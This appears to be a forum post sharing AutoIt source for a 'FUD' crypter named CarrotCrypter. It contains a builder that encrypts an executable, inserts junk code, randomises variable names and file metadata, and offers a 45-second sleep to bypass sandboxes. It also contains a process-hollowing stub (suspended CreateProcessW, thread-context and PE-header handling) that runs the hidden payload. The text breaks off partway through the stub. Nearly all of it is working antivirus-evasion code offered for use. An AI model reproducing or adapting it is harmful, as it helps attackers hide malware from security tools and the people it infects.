Backtracking
  1. Backtracking

    Source Crypter

    The best way to make an FUD crypter is to create your own crypter Here you can find the template, dont use it before you modify it! The builder: #include <ButtonConstants.au3> #include <ComboConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include "includes/Junkcode.au3" #include <crypt.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("CarrotCrypter BETA V.0.1", 642, 506, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Pic1 = GUICtrlCreatePic("images/bg.bmp", 0, 0, 641, 97) $Group1 = GUICtrlCreateGroup("File to encrypt", 360, 136, 273, 185) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group1), "wstr", 0, "wstr", 0) $Input1 = GUICtrlCreateInput("File_Input", 368, 176, 193, 21) $Input2 = GUICtrlCreateInput("File_Output", 368, 224, 193, 21) $Button3 = GUICtrlCreateButton("Chose File", 560, 174, 65, 25) $Button4 = GUICtrlCreateButton("Create File", 560, 222, 65, 25) $Label1 = GUICtrlCreateLabel("Chose a name for the encrypted file", 368, 205, 250, 17) $Label2 = GUICtrlCreateLabel("Chose a File to encrypt", 368, 155, 250, 17) $Input3 = GUICtrlCreateInput("", 368, 288, 257, 21) $Label3 = GUICtrlCreateLabel("Chose a passphrase to encrypt your file", 368, 268, 250, 17) GUICtrlCreateGroup("", -99, -99, 1, 1) $Button1 = GUICtrlCreateButton("License", 480, 104, 113, 33) $Button2 = GUICtrlCreateButton("?", 600, 104, 33, 33) $Group2 = GUICtrlCreateGroup("Encryption", 360, 328, 273, 169) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group2), "wstr", 0, "wstr", 0) $Checkbox1 = GUICtrlCreateCheckbox("x64 (Can solve compability problems)", 376, 352, 241, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox1), "wstr", 0, "wstr", 0) $Checkbox2 = GUICtrlCreateCheckbox("Manual compiling", 376, 384, 241, 17) DllCall("UxTheme.dll", "int", 
"SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox2), "wstr", 0, "wstr", 0) $Button5 = GUICtrlCreateButton("ENCRYPT MY FILE", 376, 416, 249, 73) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group3 = GUICtrlCreateGroup("USG", 8, 104, 337, 393) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group3), "wstr", 0, "wstr", 0) $Group4 = GUICtrlCreateGroup("Custom Stub", 16, 128, 321, 265) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group4), "wstr", 0, "wstr", 0) $Checkbox3 = GUICtrlCreateRadio("Create a custom stub (high security)", 32, 152, 289, 33) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox3), "wstr", 0, "wstr", 0) $Combo1 = GUICtrlCreateCombo("AES 256", 152, 184, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "3DES|DES|RC2") $Combo2 = GUICtrlCreateCombo("0% junk code (speed)", 152, 224, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "25% junk code (speed)|50% junk code (medium)|75% junk code (security)") $Label5 = GUICtrlCreateLabel("Encryption mode", 32, 184, 100, 17) $Label6 = GUICtrlCreateLabel("Junk code generator", 32, 224, 100, 17) $Group6 = GUICtrlCreateGroup("Icon changer", 24, 264, 305, 121) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group6), "wstr", 0, "wstr", 0) $Input4 = GUICtrlCreateInput(".ico", 32, 328, 201, 21) $Button7 = GUICtrlCreateButton("Chose Icon", 240, 328, 81, 25) $Label7 = GUICtrlCreateLabel("Here you can chose a new Icon for your file. 
Chosing a new Icon increases the security.", 32, 290, 284, 41) $Button8 = GUICtrlCreateButton("Chose a precreated Icon", 32, 352, 289, 25) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group5 = GUICtrlCreateGroup("More oprions", 16, 400, 321, 89) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group5), "wstr", 0, "wstr", 0) $Label4 = GUICtrlCreateLabel("More Options: external stub, File informations and further security...", 50, 435, 200, 30) $Button6 = GUICtrlCreateButton("MORE OPTIONS", 232, 424, 97, 49) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### $Informations = GUICreate("More Options", 252, 363, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Compile_Info = GUICtrlCreateGroup("File informations", 8, 0, 233, 281) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Compile_Info), "wstr", 0, "wstr", 0) $Check1 = GUICtrlCreateCheckbox("Create custom File informations", 24, 24, 201, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check1), "wstr", 0, "wstr", 0) $Company = GUICtrlCreateInput("Company", 24, 56, 201, 21) $Description = GUICtrlCreateInput("Description", 24, 88, 201, 21) $Version = GUICtrlCreateInput("Version", 24, 120, 201, 21) $CopyRight = GUICtrlCreateInput("Copyright", 24, 152, 201, 21) $ProductName = GUICtrlCreateInput("Product Name", 24, 184, 201, 21) $ProductVersion = GUICtrlCreateInput("Product Version", 24, 216, 201, 21) $OriginalName = GUICtrlCreateInput("Original Executable Name", 24, 248, 201, 21) GUICtrlCreateGroup("", -99, -99, 1, 1) $lab2 = GUICtrlCreateButton("Random File informations", 8, 296, 233, 25) $Check3 = GUICtrlCreateCheckbox("Create Delay to bypass Sandbox", 8, 328, 233, 25) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check3), "wstr", 0, "wstr", 0) 
GUISetState(@SW_HIDE) ;STYLLEE GUICtrlSetState($Combo1,$GUI_DISABLE) GUICtrlSetState($Combo2,$GUI_DISABLE) GUICtrlSetState($Input4,$GUI_DISABLE) GUICtrlSetState($Button7,$GUI_DISABLE) GUICtrlSetState($Button8,$GUI_DISABLE) GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) GUICtrlSetBkColor($Button1, 0xe6830e) GUICtrlSetColor($Button1, 0xffffff) GUICtrlSetBkColor($Button2, 0xe6830e) GUICtrlSetColor($Button2, 0xffffff) GUICtrlSetBkColor($Button3, 0xe6830e) GUICtrlSetColor($Button3, 0xffffff) GUICtrlSetBkColor($Button4, 0xe6830e) GUICtrlSetColor($Button4, 0xffffff) GUICtrlSetBkColor($Button5, 0xe6830e) GUICtrlSetColor($Button5, 0xffffff) GUICtrlSetBkColor($Button6, 0xe6830e) GUICtrlSetColor($Button6, 0xffffff) GUICtrlSetBkColor($Button7, 0xe6830e) GUICtrlSetColor($Button7, 0xffffff) GUICtrlSetBkColor($Button8, 0xe6830e) GUICtrlSetColor($Button8, 0xffffff) GUICtrlSetColor($label1, 0xffffff) GUICtrlSetColor($label2, 0xffffff) GUICtrlSetColor($label3, 0xffffff) GUICtrlSetColor($label4, 0xffffff) GUICtrlSetColor($label5, 0xffffff) GUICtrlSetColor($label6, 0xffffff) GUICtrlSetColor($label7, 0xffffff) GUICtrlSetColor($Group1, 0xffffff) GUICtrlSetColor($Group2, 0xffffff) GUICtrlSetColor($Group3, 0xffffff) GUICtrlSetColor($Group4, 0xffffff) GUICtrlSetColor($Group5, 0xffffff) GUICtrlSetColor($Group6, 0xffffff) GUICtrlSetColor($Compile_Info, 0xffffff) GUICtrlSetColor($Checkbox1, 0xffffff) GUICtrlSetColor($Checkbox2, 0xffffff) GUICtrlSetColor($Checkbox3, 0xffffff) GUICtrlSetColor($Check1, 0xffffff) GUICtrlSetColor($lab2, 0xffffff) GUICtrlSetBkColor($lab2, 0xe6830e) GUICtrlSetColor($Check3, 0xffffff) $pwd = "" Dim $aSpace[3] $digits = 15 For $i = 1 To $digits $aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z $aSpace[1] = Chr(Random(97, 122, 1)) 
;a-z $aSpace[2] = Chr(Random(48, 57, 1)) ;0-9 $pwd &= $aSpace[Random(0, 2, 1)] Next GUICtrlSetData($Input3, $pwd) ;ENDSTYYKLE $Includes = '#include "' & @ScriptDir & '\includes\crypt.au3"' & @CRLF $Delay = "" FileChangeDir(@ScriptDir) While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button6 GUISetState(@SW_SHOW, $Informations) While 1 Switch GUIGetMsg() Case $GUI_EVENT_CLOSE GUISetState(@SW_HIDE, $Informations) ExitLoop Case $Check1 If GUICtrlRead($Check1) = $GUI_CHECKED Then GUICtrlSetState($Company,$GUI_ENABLE) GUICtrlSetState($Description,$GUI_ENABLE) GUICtrlSetState($Version,$GUI_ENABLE) GUICtrlSetState($CopyRight,$GUI_ENABLE) GUICtrlSetState($ProductName,$GUI_ENABLE) GUICtrlSetState($ProductVersion,$GUI_ENABLE) GUICtrlSetState($OriginalName,$GUI_ENABLE) Else GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) EndIf Case $Check3 $Delay = "sleep(45000)" & @CRLF Case $lab2 $YEAH = _RandomString() $YEAH1 = _RandomString() $YEAH2 = _RandomVersion() $YEAH3 = _RandomString() $YEAH4 = _RandomString() $YEAH5 = _RandomVersion() $YEAH6 = _RandomString() GUICtrlSetData($Company, $YEAH) GUICtrlSetData($Description, $YEAH1) GUICtrlSetData($Version, $YEAH2) GUICtrlSetData($CopyRight, $YEAH3) GUICtrlSetData($ProductName, $YEAH4) GUICtrlSetData($ProductVersion, $YEAH5) GUICtrlSetData($OriginalName, $YEAH6) EndSwitch WEnd Case $Button3 $SourceFile = FileOpenDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input1, $SourceFile) Case $Button4 $DestinationFile = FileSaveDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input2, $DestinationFile) Case $Button7 $Icon = FileOpenDialog("C:/",@ScriptDir&'\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button8 $Icon = 
FileOpenDialog("C:/",@ScriptDir&'\icons\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button5 ;errors If GUICtrlRead($Input1) == "File_Input" Then msgbox(0, "Error", "Please chose a File to encrypt") Endif ;fin errors Switch GUICtrlRead($Combo1) Case "3DES" $algo = $CALG_3DES Case "DES" $algo = $CALG_DES Case "RC2" $algo = $CALG_RC2 Case "AES 256" $algo = $CALG_AES_256 EndSwitch Switch GUICtrlRead($Combo2) Case "0% junk code (speed)" $Junk = @CRLF & _JunkCreate(0) & @CRLF $Junk1 = @CRLF & _JunkCreate(0) & @CRLF $Junk2 = @CRLF & _JunkCreate(0) & @CRLF Case "25% junk code (speed)" $Junk = @CRLF & _JunkCreate(50) & @CRLF $Junk1 = @CRLF & _JunkCreate(50) & @CRLF $Junk2 = @CRLF & _JunkCreate(50) & @CRLF Case "50% junk code (medium)" $Junk = @CRLF & _JunkCreate(100) & @CRLF $Junk1 = @CRLF & _JunkCreate(100) & @CRLF $Junk2 = @CRLF & _JunkCreate(100) & @CRLF Case "75% junk code (security)" $Junk = @CRLF & _JunkCreate(150) & @CRLF $Junk1 = @CRLF & _JunkCreate(150) & @CRLF $Junk2 = @CRLF & _JunkCreate(150) & @CRLF Endswitch $sSourceRead = GUICtrlRead($Input1) $sDestinationRead = GUICtrlRead($Input2) $sPasswordRead = GUICtrlRead($Input3) $Company = GUICtrlRead($Company) $Description = GUICtrlRead($Description) $Version = GUICtrlRead($Version) $CopyRight = GUICtrlRead($CopyRight) $ProductName = GUICtrlRead($ProductName) $ProductVersion = GUICtrlRead($ProductVersion) $OriginalName = GUICtrlRead($OriginalName) $pragma = "#pragma compile(CompanyName, " & $Company & ")" & @CRLF & "#pragma compile(FileDescription, " & $Description & ")" & @CRLF & "#pragma compile(FileVersion, " & $Version & ")" & @CRLF & "#pragma compile(LegalCopyright, " & $Copyright & ")" & @CRLF & "#pragma compile(OriginalFilename, " & $OriginalName & ".exe )" & @CRLF & "#pragma compile(ProductName, " & $ProductName & ")" & @CRLF & "#pragma compile(ProductVersion, " & $ProductVersion & ")" & @CRLF $sIcon = GUICtrlRead($Input4) $BIN = _Binary($sSourceRead) FileChangeDir(@ScriptDir) 
;---------------------CUSTOM STUB VARIABLES------------------------------ $r1 = _RandomStringForRandomStub() ;Generate Random Variables $nRvar = 1 Dim $rV[100] while $nRvar < 100 $rV[$nRvar] = "$" & _RandomStringForRandomStub() $nRvar = $nRvar + 1 Wend ;Create the new stub $Stub = FileOpen("includes/AZERR.au3") $Content = FileRead($Stub) FileClose($Stub) ;File changes : string modification $MainFunc = StringReplace($Content, "$bBinaryImage", $rV[1]) $MainFunc1 = StringReplace($MainFunc, "_AZERR", $r1) $MainFunc2 = StringReplace($MainFunc1, "$sCommandLine", $rV[2]) $MainFunc3 = StringReplace($MainFunc2, "$sExeModule", $rV[3]) $MainFunc4 = StringReplace($MainFunc3, "$fAutoItX64", $rV[4]) $MainFunc5 = StringReplace($MainFunc4, "$bBinary", $rV[5]) $MainFunc6 = StringReplace($MainFunc5, "$tBinary", $rV[6]) $MainFunc7 = StringReplace($MainFunc6, "$iNewPID", $rV[7]) $MainFunc8 = StringReplace($MainFunc7, "$pPointer", $rV[8]) $MainFunc9 = StringReplace($MainFunc8, "$tSTARTUPINFO", $rV[9]) $MainFunc10 = StringReplace($MainFunc9, "$tPROCESS_INFORMATION", $rV[10]) $MainFunc11 = StringReplace($MainFunc10, "$aCall", $rV[11]) $MainFunc12 = StringReplace($MainFunc11, "$hProcess", $rV[12]) $MainFunc13 = StringReplace($MainFunc12, "$hThread", $rV[13]) $MainFunc14 = StringReplace($MainFunc13, "$iRunFlag", $rV[14]) $MainFunc15 = StringReplace($MainFunc14, "$tCONTEXT", $rV[15]) $MainFunc16 = StringReplace($MainFunc15, "$CONTEXT_FULL", $rV[16]) $MainFunc17 = StringReplace($MainFunc16, "$pPEB", $rV[17]) Func _RandomStringForRandomStub() $rString = "" Dim $aRr[2] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $rString &= $aRr[Random(0, 1, 1)] Next Return $rString EndFunc ;----------------------------------------------------------------------------------------- $RUN = @CRLF & $r1 & '($SDER)' & @CRLF $encryptedpass = @CRLF & "$SDER = _Crypt_DecryptData($bBinary, '" & $sPasswordRead & "', " & $algo & ")" If 
GUICtrlRead($Check1) = $GUI_CHECKED Then FileWrite($sDestinationRead & ".au3", $pragma & $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) Else FileWrite($sDestinationRead & ".au3", $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) EndIf If FileExists($sDestinationRead & ".au3") = 1 Then If GUICtrlRead($Input4) == ".ico" Then If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x86") Endif Else If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x86") Endif EndIf sleep(200) If GUICtrlRead($Checkbox2) = $GUI_CHECKED Then FileDelete($sDestinationRead & ".exe") Else FileDelete($sDestinationRead & ".au3") Endif msgbox(0, "Encryption finished", "You can now distribute your file with security") EndIf Case $Button2 msgbox(0, "Informations - Carrotcrypter", "Help" & @CRLF & " -Contact our customer team at Carrotnet.cf" & @CRLF & "Informations" & @CRLF & " -Created by Carrotinblack" & @CRLF & " -2017 copyright Thecarrotnet ©") Case $Checkbox3 GUICtrlSetState($Combo1,$GUI_ENABLE) GUICtrlSetState($Combo2,$GUI_ENABLE) GUICtrlSetState($Input4,$GUI_ENABLE) GUICtrlSetState($Button7,$GUI_ENABLE) GUICtrlSetState($Button8,$GUI_ENABLE) EndSwitch WEnd Func _Binary($FTOB) Local $hModule = FileOpen($FTOB, 16) If @error Then Exit Global $bBinary = FileRead($hModule) FileClose($hModule) $bBinary = _Crypt_EncryptData($bBinary, $sPasswordRead, $algo) Local Const $MAX_LINESIZE = 4095 Local $iNewLine, $j Local $iChinkSize = 32 Local $sBinary For $i = 1 To BinaryLen($bBinary) Step $iChinkSize $j += 1 If 
4*($j * $iChinkSize) > $MAX_LINESIZE - 129 Then $iNewLine = 1 EndIf If $iNewLine Then $iNewLine = 0 $j = 0 $sBinary = StringTrimRight($sBinary, 5) $sBinary &= @CRLF & '$bBinary &= "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF ContinueLoop EndIf If $i = 1 Then $sBinary &= '$bBinary = "' & BinaryMid($bBinary, $i, $iChinkSize) & '" & _' & @CRLF Else $sBinary &= ' "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF EndIf Next $sBinary = StringTrimRight($sBinary, 5) Return $sBinary Endfunc The Public Stub : Global $iNewPID Func _AZERR($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe) #Region 1. DETERMINE INTERPRETER TYPE Local $fAutoItX64 = @AutoItX64 #Region 2. PREDPROCESSING PASSED Local $bBinary = Binary($bBinaryImage) ; this is redundant but still... ; Make structure out of binary data that was passed Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]") DllStructSetData($tBinary, 1, $bBinary) ; fill it ; Get pointer to it Local $pPointer = DllStructGetPtr($tBinary) #Region 3. CREATING NEW PROCESS ; STARTUPINFO structure (actually all that really matters is allocated space) Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _ "ptr Reserved;" & _ "ptr Desktop;" & _ "ptr Title;" & _ "dword X;" & _ "dword Y;" & _ "dword XSize;" & _ "dword YSize;" & _ "dword XCountChars;" & _ "dword YCountChars;" & _ "dword FillAttribute;" & _ "dword Flags;" & _ "word ShowWindow;" & _ "word Reserved2;" & _ "ptr Reserved2;" & _ "ptr hStdInput;" & _ "ptr hStdOutput;" & _ "ptr hStdError") ; This is much important. This structure will hold very some important data. 
Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _ "ptr Thread;" & _ "dword ProcessId;" & _ "dword ThreadId") ; Create new process Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _ "wstr", $sExeModule, _ "wstr", $sCommandLine, _ "ptr", 0, _ "ptr", 0, _ "int", 0, _ "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential "ptr", 0, _ "ptr", 0, _ "ptr", DllStructGetPtr($tSTARTUPINFO), _ "ptr", DllStructGetPtr($tPROCESS_INFORMATION)) ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed ; Get new process and thread handles: Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process") Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread") ; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures) If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(2, 0, 0) EndIf #Region 4. FILL CONTEXT STRUCTURE ; CONTEXT structure is what's really important here. It's processor specific. 
Local $iRunFlag, $tCONTEXT If $fAutoItX64 Then If @OSArch = "X64" Then $iRunFlag = 2 $tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses "dword ContextFlags; dword MxCsr;" & _ ; Control flags "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers "uint64 Rip;" & _ ; Program counter "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!) "uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!) 
"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers Else $iRunFlag = 3 ; FIXME - Itanium architecture ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(102, 0, 0) EndIf Else $iRunFlag = 1 $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL "byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS EndIf ; Define CONTEXT_FULL Local $CONTEXT_FULL Switch $iRunFlag Case 1 $CONTEXT_FULL = 0x10007 Case 2 $CONTEXT_FULL = 0x100007 Case 3 $CONTEXT_FULL = 0x80027 EndSwitch ; Set desired access DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL) ; Fill CONTEXT structure: $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _ "handle", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed EndIf ; Pointer to PEB structure Local $pPEB Switch $iRunFlag Case 1 $pPEB = DllStructGetData($tCONTEXT, "Ebx") Case 2 $pPEB = DllStructGetData($tCONTEXT, "Rdx") Case 3 ; NEVER BE - Itanium architecture EndSwitch #Region 5. READ PE-FORMAT ; Start processing passed binary data. 'Reading' PE format follows. 
; First is IMAGE_DOS_HEADER Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _ "word BytesOnLastPage;" & _ "word Pages;" & _ "word Relocations;" & _ "word SizeofHeader;" & _ "word MinimumExtra;" & _ "word MaximumExtra;" & _ "word SS;" & _ "word SP;" & _ "word Checksum;" & _ "word IP;" & _ "word CS;" & _ "word Relocation;" & _ "word Overlay;" & _ "char Reserved[8];" & _ "word OEMIdentifier;" & _ "word OEMInformation;" & _ "char Reserved2[20];" & _ "dword AddressOfNewExeHeader", _ $pPointer) ; Save this pointer value (it's starting address of binary image headers) Local $pHEADERS_NEW = $pPointer ; Move pointer $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header ; Get "Magic" Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic") ; Check if it's valid format If Not ($sMagic == "MZ") Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(4, 0, 0) ; MS-DOS header missing. EndIf ; In place of IMAGE_NT_SIGNATURE Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer) ; Move pointer $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure ; Check signature If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword. 
EndIf ; In place of IMAGE_FILE_HEADER Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _ "word NumberOfSections;" & _ "dword TimeDateStamp;" & _ "dword PointerToSymbolTable;" & _ "dword NumberOfSymbols;" & _ "word SizeOfOptionalHeader;" & _ "word Characteristics", _ $pPointer) ; I could check here if the module is relocatable ; Local $fRelocatable ; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False ; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead) ; Get number of sections Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections") ; Move pointer $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure ; In place of IMAGE_OPTIONAL_HEADER Local $tMagic = DllStructCreate("word Magic;", $pPointer) Local $iMagic = DllStructGetData($tMagic, 1) Local $tIMAGE_OPTIONAL_HEADER If $iMagic = 267 Then ; x86 version If $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "dword BaseOfData;" & _ "dword ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ "word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "dword SizeOfStackReserve;" & _ "dword SizeOfStackCommit;" & _ "dword SizeOfHeapReserve;" & _ "dword SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword 
NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER ElseIf $iMagic = 523 Then ; x64 version If Not $fAutoItX64 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _ "byte MajorLinkerVersion;" & _ "byte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "uint64 ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "word MajorOperatingSystemVersion;" & _ "word MinorOperatingSystemVersion;" & _ "word MajorImageVersion;" & _ "word MinorImageVersion;" & _ "word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "uint64 SizeOfStackReserve;" & _ "uint64 SizeOfStackCommit;" & _ "uint64 SizeOfHeapReserve;" & _ "uint64 SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER Else DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 